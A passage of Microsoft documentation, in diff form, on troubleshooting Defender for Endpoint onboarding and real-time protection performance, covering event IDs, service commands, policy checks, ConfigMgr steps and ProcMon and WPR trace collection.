-|Case|Symptoms|Possible cause and troubleshooting steps|
-|::|||
-|`1`|Device is compliant by SenseIsRunning OMA-URI. But is non-compliant by OrgId, Onboarding and OnboardingState OMA-URIs.|**Possible cause:** Check that user passed OOBE after Windows installation or upgrade. During OOBE onboarding couldn't be completed but SENSE is running already. <p> **Troubleshooting steps:** Wait for OOBE to complete.|
-|`2`|Device is compliant by OrgId, Onboarding, and OnboardingState OMA-URIs, but is non-compliant by SenseIsRunning OMA-URI.|**Possible cause:** Sense service's startup type is set as "Delayed Start". Sometimes this causes the Microsoft Intune server to report the device as non-compliant by SenseIsRunning when DM session occurs on system start. <p> **Troubleshooting steps:** The issue should automatically be fixed within 24 hours.|
-|`3`|Device is non-compliant|**Troubleshooting steps:** Ensure that Onboarding and Offboarding policies aren't deployed on the same device at same time.|
-
-#### Mobile Device Management (MDM) event logs
-
-View the MDM event logs to troubleshoot issues that might arise during onboarding:
-
-Log name: Microsoft\Windows\DeviceManagement-EnterpriseDiagnostics-Provider
-
-Channel name: Admin
-
-|ID|Severity|Event description|Troubleshooting steps|
-|||||
-|1819|Error|Microsoft Defender for Endpoint CSP: Failed to Set Node's Value. NodeId: (%1), TokenName: (%2), Result: (%3).|Download the [Cumulative Update for Windows 10, 1607](https://go.microsoft.com/fwlink/?linkid=829760).|
-
-## Troubleshoot onboarding issues on the device
-
-If the deployment tools used do not indicate an error in the onboarding process, but devices are still not appearing in the devices list in an hour, go through the following verification topics to check if an error occurred with the Microsoft Defender for Endpoint agent.
--- [View agent onboarding errors in the device event log](#view-agent-onboarding-errors-in-the-device-event-log)-- [Ensure the diagnostic data service is enabled](#ensure-the-diagnostics-service-is-enabled)-- [Ensure the service is set to start](#ensure-the-service-is-set-to-start)-- [Ensure the device has an Internet connection](#ensure-the-device-has-an-internet-connection)-- [Ensure that Microsoft Defender Antivirus is not disabled by a policy](#ensure-that-microsoft-defender-antivirus-is-not-disabled-by-a-policy)-
-### View agent onboarding errors in the device event log
-
-1. Click **Start**, type **Event Viewer**, and press **Enter**.
-
-2. In the **Event Viewer (Local)** pane, expand **Applications and Services Logs** \> **Microsoft** \> **Windows** \> **SENSE**.
-
- > [!NOTE]
- > SENSE is the internal name used to refer to the behavioral sensor that powers Microsoft Defender for Endpoint.
-
-3. Select **Operational** to load the log.
-
-4. In the **Action** pane, click **Filter Current log**.
-
-5. On the **Filter** tab, under **Event level:** select **Critical**, **Warning**, and **Error**, and click **OK**.
-
- :::image type="content" source="media/filter-log.png" alt-text="The Event Viewer log filter" lightbox="media/filter-log.png":::
-
-6. Events which can indicate issues appear in the **Operational** pane. You can attempt to troubleshoot them based on the solutions in the following table:
-
- |Event ID|Message|Resolution steps|
- |::|||
- |`5`|Microsoft Defender for Endpoint service failed to connect to the server at _variable_|[Ensure the device has Internet access](#ensure-the-device-has-an-internet-connection).|
- |`6`|Microsoft Defender for Endpoint service isn't onboarded and no onboarding parameters were found. Failure code: _variable_|[Run the onboarding script again](configure-endpoints-script.md).|
- |`7`|Microsoft Defender for Endpoint service failed to read the onboarding parameters. Failure code: _variable_|[Ensure the device has Internet access](#ensure-the-device-has-an-internet-connection), then run the entire onboarding process again.|
- |`9`|Microsoft Defender for Endpoint service failed to change its start type. Failure code: variable|If the event happened during onboarding, reboot and re-attempt running the onboarding script. For more information, see [Run the onboarding script again](configure-endpoints-script.md). <br><br>If the event happened during offboarding, contact support.|
- |`10`|Microsoft Defender for Endpoint service failed to persist the onboarding information. Failure code: variable|If the event happened during onboarding, re-attempt running the onboarding script. For more information, see [Run the onboarding script again](configure-endpoints-script.md). <br><br>If the problem persists, contact support.|
- |`15`|Microsoft Defender for Endpoint can't start command channel with URL: _variable_|[Ensure the device has Internet access](#ensure-the-device-has-an-internet-connection).|
- |`17`|Microsoft Defender for Endpoint service failed to change the Connected User Experiences and Telemetry service location. Failure code: variable|[Run the onboarding script again](configure-endpoints-script.md). If the problem persists, contact support.|
- |`25`|Microsoft Defender for Endpoint service failed to reset health status in the registry. Failure code: _variable_|Contact support.|
- |`27`|Failed to enable Microsoft Defender for Endpoint mode in Windows Defender. Onboarding process failed. Failure code: variable|Contact support.|
- |`29`|Failed to read the offboarding parameters. Error type: %1, Error code: %2, Description: %3|Ensure the device has Internet access, then run the entire offboarding process again.|
- |`30`|Failed to disable $(build.sense.productDisplayName) mode in Microsoft Defender for Endpoint. Failure code: %1|Contact support.|
- |`32`|$(build.sense.productDisplayName) service failed to request to stop itself after offboarding process. Failure code: %1|Verify that the service start type is manual and reboot the device.|
- |`55`|Failed to create the Secure ETW autologger. Failure code: %1|Reboot the device.|
- |`63`|Updating the start type of external service. Name: %1, actual start type: %2, expected start type: %3, exit code: %4|Identify what is causing changes in start type of mentioned service. If the exit code isn't 0, fix the start type manually to expected start type.|
- |`64`|Starting stopped external service. Name: %1, exit code: %2|Contact support if the event keeps re-appearing.|
- |`68`|The start type of the service is unexpected. Service name: %1, actual start type: %2, expected start type: %3|Identify what is causing changes in start type. Fix mentioned service start type.|
- |`69`|The service is stopped. Service name: %1|Start the mentioned service. Contact support if the issue persists.|
-
-There are additional components on the device that the Microsoft Defender for Endpoint agent depends on to function properly. If there are no onboarding related errors in the Microsoft Defender for Endpoint agent event log, proceed with the following steps to ensure that the additional components are configured correctly.
-
-<span id="ensure-the-diagnostics-service-is-enabled" />
-
-### Ensure the diagnostic data service is enabled
-
- > [!NOTE]
- > In Windows 10 build 1809 and later, the Defender for Endpoint EDR service no longer has a direct dependency on the DiagTrack service.
- > The EDR cyber evidence can still be uploaded if this service is not running.
-
-If the devices aren't reporting correctly, you might need to check that the Windows diagnostic data service is set to automatically start and is running on the device. The service might have been disabled by other programs or user configuration changes.
-
-First, you should check that the service is set to start automatically when Windows starts, then you should check that the service is currently running (and start it if it isn't).
-
-### Ensure the service is set to start
-
-**Use the command line to check the Windows diagnostic data service startup type**:
-
-1. Open an elevated command-line prompt on the device:
-
- a. Click **Start**, type **cmd**, and press **Enter**.
-
- b. Right-click **Command prompt** and select **Run as administrator**.
-
-2. Enter the following command, and press **Enter**:
-
- ```console
- sc qc diagtrack
- ```
-
- If the service is enabled, then the result should look like the following screenshot:
-
- :::image type="content" source="media/windefatp-sc-qc-diagtrack.png" alt-text="The result of the sc query command for diagtrack" lightbox="media/windefatp-sc-qc-diagtrack.png":::
-
- If the `START_TYPE` isn't set to `AUTO_START`, then you need to set the service to automatically start.
-
-**Use the command line to set the Windows diagnostic data service to automatically start:**
-
-1. Open an elevated command-line prompt on the device:
-
- a. Click **Start**, type **cmd**, and press **Enter**.
-
- b. Right-click **Command prompt** and select **Run as administrator**.
-
-2. Enter the following command, and press **Enter**:
-
- ```console
- sc config diagtrack start=auto
- ```
-
-3. A success message is displayed. Verify the change by entering the following command, and press **Enter**:
-
- ```console
- sc qc diagtrack
- ```
-
-4. Start the service. In the command prompt, type the following command and press **Enter**:
-
- ```console
- sc start diagtrack
- ```
-
-### Ensure the device has an Internet connection
-
-The Microsoft Defender for Endpoint sensor requires Microsoft Windows HTTP (WinHTTP) to report sensor data and communicate with the Microsoft Defender for Endpoint service.
-
-WinHTTP is independent of the Internet browsing proxy settings and other user context applications and must be able to detect the proxy servers that are available in your particular environment.
-
-To ensure that sensor has service connectivity, follow the steps described in the [Verify client connectivity to Microsoft Defender for Endpoint service URLs](verify-connectivity.md) topic.
-
-If the verification fails and your environment is using a proxy to connect to the Internet, then follow the steps described in [Configure proxy and Internet connectivity settings](configure-proxy-internet.md) topic.
-
-### Ensure that Microsoft Defender Antivirus is not disabled by a policy
-
-> [!IMPORTANT]
-> The following only applies to devices that have **not** yet received the August 2020 (version 4.18.2007.8) update to Microsoft Defender Antivirus.
->
-> The update ensures that Microsoft Defender Antivirus cannot be turned off on client devices via system policy.
-
-**Problem**: The Microsoft Defender for Endpoint service doesn't start after onboarding.
-
-**Symptom**: Onboarding successfully completes, but you see error 577 or error 1058 when trying to start the service.
-
-**Solution**: If your devices are running a third-party antimalware client, the Microsoft Defender for Endpoint agent needs the Early Launch Antimalware (ELAM) driver to be enabled. You must ensure that it's not turned off by a system policy.
--- Depending on the tool that you use to implement policies, you need to verify that the following Windows Defender policies are cleared:-
- - DisableAntiSpyware
- - DisableAntiVirus
-
- For example, in Group Policy there should be no entries such as the following values:
-
- - `<Key Path="SOFTWARE\Policies\Microsoft\Windows Defender"><KeyValue Value="0" ValueKind="DWord" Name="DisableAntiSpyware"/></Key>`
- - `<Key Path="SOFTWARE\Policies\Microsoft\Windows Defender"><KeyValue Value="0" ValueKind="DWord" Name="DisableAntiVirus"/></Key>`
-
-> [!IMPORTANT]
-> The `disableAntiSpyware` setting is discontinued and will be ignored on all Windows 10 devices, as of the August 2020 (version 4.18.2007.8) update to Microsoft Defender Antivirus.
--- After clearing the policy, run the onboarding steps again.--- You can also check the previous registry key values to verify that the policy is disabled, by opening the registry key `HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender`.-
- :::image type="content" source="media/atp-disableantispyware-regkey.png" alt-text="The registry key for Microsoft Defender Antivirus" lightbox="media/atp-disableantispyware-regkey.png":::
-
- > [!NOTE]
- > All Windows Defender services (`wdboot`, `wdfilter`, `wdnisdrv`, `wdnissvc`, and `windefend`) should be in their default state. Changing the startup of these services is unsupported and may force you to reimage your system. Example default configurations for `WdBoot` and `WdFilter`:
- >
- > - `<Key Path="SYSTEM\CurrentControlSet\Services\WdBoot"><KeyValue Value="0" ValueKind="DWord" Name="Start"/></Key>`
- > - `<Key Path="SYSTEM\CurrentControlSet\Services\WdFilter"><KeyValue Value="0" ValueKind="DWord" Name="Start"/></Key>`
- >
- > If Microsoft Defender Antivirus is in passive mode, these drivers are set to manual (`0`).
-
-## Troubleshoot onboarding issues
-
-> [!NOTE]
-> The following troubleshooting guidance is only applicable for Windows Server 2016 and earlier versions of Windows Server.
-
-If you encounter issues while onboarding a server, go through the following verification steps to address possible issues.
--- [Ensure Microsoft Monitoring Agent (MMA) is installed and configured to report sensor data to the service](configure-server-endpoints.md)-- [Ensure that the server proxy and Internet connectivity settings are configured properly](configure-server-endpoints.md)-
-You might also need to check the following:
--- Check that there's a Microsoft Defender for Endpoint Service running in the **Processes** tab in **Task Manager**. For example:-
- :::image type="content" source="media/atp-task-manager.png" alt-text="The process view with Microsoft Defender for Endpoint Service running" lightbox="media/atp-task-manager.png":::
--- Check **Event Viewer** \> **Applications and Services Logs** \> **Operation Manager** to see if there are any errors.--- In **Services**, check if the **Microsoft Monitoring Agent** is running on the server. For example,-
- :::image type="content" source="media/atp-services.png" alt-text="The services" lightbox="media/atp-services.png":::
--- In **Microsoft Monitoring Agent** \> **Azure Log Analytics (OMS)**, check the Workspaces and verify that the status is running.-
- :::image type="content" source="media/atp-mma-properties.png" alt-text="The Microsoft Monitoring Agent Properties" lightbox="media/atp-mma-properties.png":::
--- Check to see that devices are reflected in the **Devices list** in the portal.-
-## Confirming onboarding of newly built devices
-
-There may be instances when onboarding is deployed on a newly built device but not completed.
-
-The steps below provide guidance for the following scenario:
--- Onboarding package is deployed to newly built devices-- Sensor doesn't start because the Out-of-box experience (OOBE) or first user logon hasn't been completed-- Device is turned off or restarted before the end user performs a first logon-- In this scenario, the SENSE service won't start automatically even though onboarding package was deployed-
-> [!NOTE]
-> User Logon after OOBE is no longer required for SENSE service to start on the following or more recent Windows versions:
-> Windows 10, version 1809 or Windows Server 2019, or Windows Server 2022 with [April 22 2021 update rollup](https://support.microsoft.com/kb/5001384).
-> Windows 10, version 1909 with [April 2021 update rollup](https://support.microsoft.com/kb/5001396).
-> Windows 10, version 2004/20H2 with [April 28 2021 update rollup](https://support.microsoft.com/kb/5001391).
--
-> [!NOTE]
-> The following steps are only relevant when using Microsoft Endpoint Configuration Manager. For more information about onboarding using Microsoft Endpoint Configuration Manager, see [Microsoft Defender for Endpoint](/mem/configmgr/protect/deploy-use/windows-defender-advanced-threat-protection).
-
-1. Create an application in Microsoft Endpoint Configuration Manager.
-
- :::image type="content" source="media/mecm-1.png" alt-text="The Microsoft Endpoint Configuration Manager configuration-1" lightbox="media/mecm-1.png":::
-
-2. Select **Manually specify the application information**.
-
- :::image type="content" source="media/mecm-2.png" alt-text="The Microsoft Endpoint Configuration Manager configuration-2" lightbox="media/mecm-2.png":::
-
-3. Specify information about the application, then select **Next**.
-
- :::image type="content" source="media/mecm-3.png" alt-text="The Microsoft Endpoint Configuration Manager configuration-3" lightbox="media/mecm-3.png":::
-
-4. Specify information about the software center, then select **Next**.
-
- :::image type="content" source="media/mecm-4.png" alt-text="The Microsoft Endpoint Configuration Manager configuration-4" lightbox="media/mecm-4.png":::
-
-5. In **Deployment types** select **Add**.
-
- :::image type="content" source="media/mecm-5.png" alt-text="The Microsoft Endpoint Configuration Manager configuration-5" lightbox="media/mecm-5.png":::
-
-6. Select **Manually specify the deployment type information**, then select **Next**.
-
- :::image type="content" source="media/mecm-6.png" alt-text="The Microsoft Endpoint Configuration Manager configuration-6" lightbox="media/mecm-6.png":::
-
-7. Specify information about the deployment type, then select **Next**.
-
- :::image type="content" source="media/mecm-7.png" alt-text="The Microsoft Endpoint Configuration Manager configuration-7" lightbox="media/mecm-7.png":::
-
-8. In **Content** \> **Installation program** specify the command: `net start sense`.
-
- :::image type="content" source="media/mecm-8.png" alt-text="The Microsoft Endpoint Configuration Manager configuration-8" lightbox="media/mecm-8.png":::
-
-9. In **Detection method**, select **Configure rules to detect the presence of this deployment type**, then select **Add Clause**.
-
- :::image type="content" source="media/mecm-9.png" alt-text="The Microsoft Endpoint Configuration Manager configuration-9" lightbox="media/mecm-9.png":::
-
-10. Specify the following detection rule details, then select **OK**:
-
- :::image type="content" source="media/mecm-10.png" alt-text="The Microsoft Endpoint Configuration Manager configuration-10" lightbox="media/mecm-10.png":::
-
-11. In **Detection method** select **Next**.
-
- :::image type="content" source="media/mecm-11.png" alt-text="The Microsoft Endpoint Configuration Manager configuration-11" lightbox="media/mecm-11.png":::
-
-12. In **User Experience**, specify the following information, then select **Next**:
-
- :::image type="content" source="media/mecm-12.png" alt-text="The Microsoft Endpoint Configuration Manager configuration-12" lightbox="media/mecm-12.png":::
-
-13. In **Requirements**, select **Next**.
-
- :::image type="content" source="media/mecm-13.png" alt-text="The Microsoft Endpoint Configuration Manager configuration-13" lightbox="media/mecm-13.png":::
-
-14. In **Dependencies**, select **Next**.
-
- :::image type="content" source="media/mecm-14.png" alt-text="The Microsoft Endpoint Configuration Manager configuration-14" lightbox="media/mecm-14.png":::
-
-15. In **Summary**, select **Next**.
-
- :::image type="content" source="media/mecm-15.png" alt-text="The Microsoft Endpoint Configuration Manager configuration-15" lightbox="media/mecm-15.png":::
-
-16. In **Completion**, select **Close**.
-
- :::image type="content" source="media/mecm-16.png" alt-text="The Microsoft Endpoint Configuration Manager configuration-16" lightbox="media/mecm-16.png":::
-
-17. In **Deployment types**, select **Next**.
-
- :::image type="content" source="media/mecm-17.png" alt-text="The Microsoft Endpoint Configuration Manager configuration-17" lightbox="media/mecm-17.png":::
-
-18. In **Summary**, select **Next**.
-
- :::image type="content" source="media/mecm-18.png" alt-text="The Microsoft Endpoint Configuration Manager configuration-18" lightbox="media/mecm-18.png":::
-
- The status is then displayed:
- :::image type="content" source="media/mecm-19.png" alt-text="The Microsoft Endpoint Configuration Manager configuration-19" lightbox="media/mecm-19.png":::
-
-19. In **Completion**, select **Close**.
-
- :::image type="content" source="media/mecm-20.png" alt-text="The Microsoft Endpoint Configuration Manager configuration-20" lightbox="media/mecm-20.png":::
-
-20. You can now deploy the application by right-clicking the app and selecting **Deploy**.
-
- :::image type="content" source="media/mecm-21.png" alt-text="The Microsoft Endpoint Configuration Manager configuration-21" lightbox="media/mecm-21.png":::
-
-21. In **General** select **Automatically distribute content for dependencies** and **Browse**.
-
- :::image type="content" source="media/mecm-22.png" alt-text="The Microsoft Endpoint Configuration Manager configuration-22" lightbox="media/mecm-22.png":::
-
-22. In **Content** select **Next**.
-
- :::image type="content" source="media/mecm-23.png" alt-text="The Microsoft Endpoint Configuration Manager configuration-23" lightbox="media/mecm-23.png":::
-
-23. In **Deployment settings**, select **Next**.
-
- :::image type="content" source="media/mecm-24.png" alt-text="The Microsoft Endpoint Configuration Manager configuration-24" lightbox="media/mecm-24.png":::
-
-24. In **Scheduling** select **As soon as possible after the available time**, then select **Next**.
-
- :::image type="content" source="media/mecm-25.png" alt-text="The Microsoft Endpoint Configuration Manager configuration-25" lightbox="media/mecm-25.png":::
-
-25. In **User experience**, select **Commit changes at deadline or during a maintenance window (requires restarts)**, then select **Next**.
-
- :::image type="content" source="media/mecm-26.png" alt-text="The Microsoft Endpoint Configuration Manager configuration-26" lightbox="media/mecm-26.png":::
-
-26. In **Alerts** select **Next**.
-
- :::image type="content" source="media/mecm-27.png" alt-text="The Microsoft Endpoint Configuration Manager configuration-27" lightbox="media/mecm-27.png":::
-
-27. In **Summary**, select **Next**.
-
- :::image type="content" source="media/mecm-28.png" alt-text="The Microsoft Endpoint Configuration Manager configuration-28" lightbox="media/mecm-28.png":::
-
- The status is then displayed
- :::image type="content" source="media/mecm-29.png" alt-text="The Microsoft Endpoint Configuration Manager configuration-29" lightbox="media/mecm-29.png":::
-
-28. In **Completion**, select **Close**.
-
- :::image type="content" source="media/mecm-30.png" alt-text="The Microsoft Endpoint Configuration Manager configuration-30" lightbox="media/mecm-30.png":::
-
-## Related topics
--- [Troubleshoot Microsoft Defender for Endpoint](troubleshoot-mdatp.md)-- [Onboard devices](onboard-configure.md)-- [Configure device proxy and Internet connectivity settings](configure-proxy-internet.md)
security Troubleshoot Performance Issues https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender-endpoint/troubleshoot-performance-issues.md
- Title: Troubleshoot performance issues
-description: Troubleshoot high CPU usage related to the real-time protection service in Microsoft Defender for Endpoint.
---- Previously updated : 10/19/2021----- m365-security-- tier3-- mde-ngp--
-# Troubleshoot performance issues related to real-time protection
----
-**Applies to:**
--- [Microsoft Defender for Endpoint Plan 1](https://go.microsoft.com/fwlink/p/?linkid=2154037)-- [Microsoft Defender for Endpoint Plan 2](https://go.microsoft.com/fwlink/p/?linkid=2154037)-- Microsoft Defender Antivirus-
-**Platforms**
-- Windows-
-If your system is having high CPU usage or performance issues related to the real-time protection service in Microsoft Defender for Endpoint, you can submit a ticket to Microsoft support. Follow the steps in [Collect Microsoft Defender Antivirus diagnostic data](collect-diagnostic-data.md).
-
-As an admin, you can also troubleshoot these issues on your own.
-
-First, you might want to check if the issue is being caused by another software. Read [Check with vendor for antivirus exclusions](#check-with-vendor-for-antivirus-exclusions).
-
-Otherwise, you can identify which software is related to the identified performance issue by following the steps in [Analyze the Microsoft Protection Log](#analyze-the-microsoft-protection-log).
-
-You can also provide additional logs to your submission to Microsoft support by following the steps in:
--- [Capture process logs using Process Monitor](#capture-process-logs-using-process-monitor)-- [Capture performance logs using Windows Performance Recorder](#capture-performance-logs-using-windows-performance-recorder)-
-For performance-specific issues related to Microsoft Defender Antivirus, see: [Performance analyzer for Microsoft Defender Antivirus](tune-performance-defender-antivirus.md)
-
-## Check with vendor for antivirus exclusions
-
-If you can readily identify the software affecting system performance, go to the software vendor's knowledge base or support center. Search if they have recommendations about antivirus exclusions. If the vendor's website does not have them, you can open a support ticket with them and ask them to publish one.
-
-We recommend that software vendors follow the various guidelines in [Partnering with the industry to minimize false positives](https://www.microsoft.com/security/blog/2018/08/16/partnering-with-the-industry-to-minimize-false-positives/). The vendor can submit their software through the [Microsoft Security Intelligence portal](https://www.microsoft.com/wdsi/filesubmission?persona=SoftwareDeveloper).
-
-## Analyze the Microsoft Protection Log
-You can find the Microsoft protection log file in **C:\ProgramData\Microsoft\Windows Defender\Support**.
-
-In **MPLog-xxxxxxxx-xxxxxx.log**, you can find the estimated performance impact information of running software as *EstimatedImpact*:
-
-`Per-process counts:ProcessImageName: smsswd.exe, TotalTime: 6597, Count: 1406, MaxTime: 609, MaxTimeFile: \Device\HarddiskVolume3\_SMSTaskSequence\Packages\WQ1008E9\Files\FramePkg.exe, EstimatedImpact: 65%`
-
-<br>
-
-****
-
-|Field name|Description|
-|||
-|ProcessImageName|Process image name|
-|TotalTime|The cumulative duration in milliseconds spent in scans of files accessed by this process|
-|Count|The number of scanned files accessed by this process|
-|MaxTime|The duration in milliseconds in the longest single scan of a file accessed by this process|
-|MaxTimeFile|The path of the file accessed by this process for which the longest scan of `MaxTime` duration was recorded|
-|EstimatedImpact|The percentage of time spent in scans for files accessed by this process out of the period in which this process experienced scan activity|
-|
-
-If the performance impact is high, try adding the process to the Path/Process exclusions by following the steps in [Configure and validate exclusions for Microsoft Defender Antivirus scans](collect-diagnostic-data.md).
-
-If the previous step doesn't solve the problem, you can collect more information through the [Process Monitor](#capture-process-logs-using-process-monitor) or the [Windows Performance Recorder](#capture-performance-logs-using-windows-performance-recorder) in the following sections.
-
-## Capture process logs using Process Monitor
-
-Process Monitor (ProcMon) is an advanced monitoring tool that can show real-time processes. You can use this to capture the performance issue as it is occurring.
-
-1. Download [Process Monitor v3.89](/sysinternals/downloads/procmon) to a folder like `C:\temp`.
-
-2. To remove the file's mark of the web:
- 1. Right-click **ProcessMonitor.zip** and select **Properties**.
- 1. Under the *General* tab, look for *Security*.
- 1. Check the box beside **Unblock**.
- 1. Select **Apply**.
-
- :::image type="content" source="media/procmon-motw.png" alt-text="The Remove MOTW page" lightbox="media/procmon-motw.png":::
-
-3. Unzip the file in `C:\temp` so that the folder path will be `C:\temp\ProcessMonitor`.
-
-4. Copy **ProcMon.exe** to the Windows client or Windows server you're troubleshooting.
-
-5. Before running ProcMon, make sure all other applications not related to the high CPU usage issue are closed. Doing this will minimize the number of processes to check.
-
-6. You can launch ProcMon in two ways.
- 1. Right-click **ProcMon.exe** and select **Run as administrator**.
-
- Since logging starts automatically, select the magnifying glass icon to stop the current capture or use the keyboard shortcut **Ctrl+E**.
-
- :::image type="content" source="media/procmon-magglass.png" alt-text="The magnifying glass icon" lightbox="media/procmon-magglass.png":::
-
- To verify that you have stopped the capture, check if the magnifying glass icon now appears with a red X.
-
- :::image type="content" source="media/procmon-magglass-stop.png" alt-text="The red slash" lightbox="media/procmon-magglass-stop.png":::
-
- Next, to clear the earlier capture, select the eraser icon.
-
- :::image type="content" source="media/procmon-eraser-clear.png" alt-text="The clear icon" lightbox="media/procmon-eraser-clear.png":::
-
- Or use the keyboard shortcut **Ctrl+X**.
-
- 2. The second way is to run the **command line** as admin, then from the Process Monitor path, run:
-
- :::image type="content" source="medi-procmon.png":::
-
- ```console
- Procmon.exe /AcceptEula /Noconnect /Profiling
- ```
-
- > [!TIP]
- > Make the ProcMon window as small as possible when capturing data so you can easily start and stop the trace.
- >
- > :::image type="content" source="media/procmon-minimize.png" alt-text="The page displaying a minimize Procmon" lightbox="media/procmon-minimize.png":::
-
-7. After following one of the procedures in step 6, you'll next see an option to set filters. Select **OK**. You can always filter the results after the capture is completed.
-
- :::image type="content" source="media/procmon-filter-options.png" alt-text="The page on which System Exclude is chosen as the Filter out Process Name" lightbox="media/procmon-filter-options.png":::
-
-8. To start the capture, select the magnifying glass icon again.
-
-9. Reproduce the problem.
-
- > [!TIP]
- > Wait for the problem to be fully reproduced, then take note of the timestamp when the trace started.
-
-10. Once you have two to four minutes of process activity during the high CPU usage condition, stop the capture by selecting the magnifying glass icon.
-
-11. To save the capture with a unique name and with the .pml format, select **File** then select **Save...**. Make sure to select the radio buttons **All events** and **Native Process Monitor Format (PML)**.
-
- :::image type="content" source="media/procmon-savesettings1.png" alt-text="The save settings page" lightbox="media/procmon-savesettings1.png":::
-
-12. For better tracking, change the default path from `C:\temp\ProcessMonitor\LogFile.PML` to `C:\temp\ProcessMonitor\%ComputerName%_LogFile_MMDDYEAR_Repro_of_issue.PML` where:
- - `%ComputerName%` is the device name
- - `MMDDYEAR` is the month, day, and year
- - `Repro_of_issue` is the name of the issue you're trying to reproduce
-
- > [!TIP]
- > If you have a working system, you might want to get a sample log to compare.
-
-13. Zip the .pml file and submit it to Microsoft support.
-
-## Capture performance logs using Windows Performance Recorder
-
-You can use Windows Performance Recorder (WPR) to include additional information in your submission to Microsoft support. WPR is a powerful recording tool that creates Event Tracing for Windows recordings.
-
-WPR is part of the Windows Assessment and Deployment Kit (Windows ADK) and can be downloaded from [Download and install the Windows ADK](/windows-hardware/get-started/adk-install). You can also download it as part of the Windows 10 Software Development Kit at [Windows 10 SDK](https://developer.microsoft.com/windows/downloads/windows-10-sdk/).
-
-You can use the WPR user interface by following the steps in [Capture performance logs using the WPR UI](#capture-performance-logs-using-the-wpr-ui).
-
-Alternatively, you can also use the command-line tool *wpr.exe*, which is available in Windows 8 and later versions by following the steps in [Capture performance logs using the WPR CLI](#capture-performance-logs-using-the-wpr-cli).
-
-### Capture performance logs using the WPR UI
-
-> [!TIP]
-> If multiple devices are experiencing this issue, use the one which has the most RAM.
-
-1. Download and install WPR.
-
-2. Under *Windows Kits*, right-click **Windows Performance Recorder**.
-
- :::image type="content" source="media/wpr-01.png" alt-text="The Start menu" lightbox="media/wpr-01.png":::
-
- Select **More**. Select **Run as administrator**.
-
-3. When the User Account Control dialog box appears, select **Yes**.
-
- :::image type="content" source="media/wpt-yes.png" alt-text="The UAC page" lightbox="media/wpt-yes.png":::
-
-4. Next, download the [Microsoft Defender for Endpoint analysis](https://github.com/YongRhee-MDE/Scripts/blob/master/MDAV.wprp) profile and save as `MDAV.wprp` to a folder like `C:\temp`.
-
-5. On the WPR dialog box, select **More options**.
-
- :::image type="content" source="media/wpr-03.png" alt-text="The page on which you can select more options" lightbox="media/wpr-03.png":::
--
-6. Select **Add Profiles...** and browse to the path of the `MDAV.wprp` file.
-
-7. After that, you should see a new profile set under *Custom measurements* named *Microsoft Defender for Endpoint analysis* underneath it.
-
- :::image type="content" source="media/wpr-infile.png" alt-text="The in-file" lightbox="media/wpr-infile.png":::
-
- > [!WARNING]
- > If your Windows Server has 64 GB of RAM or more, use the custom measurement `Microsoft Defender for Endpoint analysis for large servers` instead of `Microsoft Defender for Endpoint analysis`. Otherwise, your system could consume a high amount of non-paged pool memory or buffers which can lead to system instability. You can choose which profiles to add by expanding **Resource Analysis**.
- This custom profile provides the necessary context for in-depth performance analysis.
-
-8. To use the custom measurement Microsoft Defender for Endpoint verbose analysis profile in the WPR UI:
-
- 1. Ensure no profiles are selected under the *First-level triage*, *Resource Analysis* and *Scenario Analysis* groups.
- 2. Select **Custom measurements**.
- 3. Select **Microsoft Defender for Endpoint analysis**.
- 4. Select **Verbose** under *Detail* level.
- 5. Select **File** or **Memory** under Logging mode.
-
- > [!IMPORTANT]
- > You should select *File* to use the file logging mode if the performance issue can be reproduced directly by the user. Most issues fall under this category. However, if the user cannot directly reproduce the issue but can easily notice it once the issue occurs, the user should select *Memory* to use the memory logging mode. This ensures that the trace log will not inflate excessively due to the long run time.
-
-9. Now you're ready to collect data. Exit all the applications that are not relevant to reproducing the performance issue. You can select **Hide options** to keep the space occupied by the WPR window small.
-
- :::image type="content" source="media/wpr-08.png" alt-text="The Hide options" lightbox="media/wpr-08.png":::
-
- > [!TIP]
- > Try starting the trace at whole number seconds. For instance, 01:30:00. This will make it easier to analyze the data. Also try to keep track of the timestamp of exactly when the issue is reproduced.
-
-10. Select **Start**.
-
- :::image type="content" source="media/wpr-09.png" alt-text="The Record system information page" lightbox="media/wpr-09.png":::
-
-11. Reproduce the issue.
-
- > [!TIP]
- > Keep the data collection to no more than five minutes. Two to three minutes is a good range since a lot of data is being collected.
-
-12. Select **Save**.
-
- :::image type="content" source="media/wpr-10.png" alt-text="The Save option" lightbox="media/wpr-10.png":::
-
-13. Fill up **Type in a detailed description of the problem:** with information about the problem and how you reproduced the issue.
-
- :::image type="content" source="media/wpr-12.png" alt-text="The pane in which you fill" lightbox="media/wpr-12.png":::
-
- 1. Select **File Name:** to determine where your trace file will be saved. By default, it is saved to `%user%\Documents\WPR Files\`.
- 1. Select **Save**.
-
-14. Wait while the trace is being merged.
-
- :::image type="content" source="media/wpr-13.png" alt-text="The WPR gathering general trace" lightbox="media/wpr-13.png":::
-
-15. Once the trace is saved, select **Open folder**.
-
- :::image type="content" source="media/wpr-14.png" alt-text="The page displaying the notification that WPR trace has been saved" lightbox="media/wpr-14.png":::
-
- Include both the file and the folder in your submission to Microsoft Support.
-
- :::image type="content" source="media/wpr-15.png" alt-text="The details of the file and the folder" lightbox="media/wpr-15.png":::
-
-### Capture performance logs using the WPR CLI
-
-The command-line tool *wpr.exe* is part of the operating system starting with Windows 8. To collect a WPR trace using the command-line tool wpr.exe:
-
-1. Download **[Microsoft Defender for Endpoint analysis](https://github.com/YongRhee-MDE/Scripts/blob/master/MDAV.wprp)** profile for performance traces to a file named `MDAV.wprp` in a local directory such as `C:\traces`.
-
-2. Right-click the **Start Menu** icon and select **Windows PowerShell (Admin)** or **Command Prompt (Admin)** to open an Admin command prompt window.
-
-3. When the User Account Control dialog box appears, select **Yes**.
-
-4. At the elevated prompt, run the following command to start a Microsoft Defender for Endpoint performance trace:
-
- ```console
- wpr.exe -start C:\traces\MDAV.wprp!WD.Verbose -filemode
- ```
-
- > [!WARNING]
- > If your Windows Server has 64 GB or RAM or more, use profiles `WDForLargeServers.Light` and `WDForLargeServers.Verbose` instead of profiles `WD.Light` and `WD.Verbose`, respectively. Otherwise, your system could consume a high amount of non-paged pool memory or buffers which can lead to system instability.
-
-5. Reproduce the issue.
-
- > [!TIP]
- > Keep the data collection no to more than five minutes. Depending on the scenario, two to three minutes is a good range since a lot of data is being collected.
-
-6. At the elevated prompt, run the following command to stop the performance trace, making sure to provide information about the problem and how you reproduced the issue:
-
- ```console
